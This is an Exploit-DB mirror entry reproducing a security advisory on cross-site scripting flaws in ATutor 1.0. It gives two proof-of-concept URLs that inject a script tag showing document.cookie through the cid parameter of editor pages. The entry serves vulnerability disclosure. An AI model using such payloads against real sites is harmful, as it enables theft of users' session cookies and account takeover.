exploit-db-mirror/platforms/php/webapps/34631.txt
Offensive Security e2eef480e2 Updated 09_14_2014
2014-09-14 04:44:14 +00:00

11 lines
691 B
Text
Executable file

source: http://www.securityfocus.com/bid/43241/info
ATutor is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ATutor 1.0 is vulnerable, other versions may also be affected.
http://www.example.com/mods/_core/editor/delete_content.php?cid=PAGE_ID"><script>alert(document.cookie)</script>
http://www.example.com/mods/_core/editor/edit_content_folder.php?cid=PAGE_ID"><script>alert(document.cookie)</script>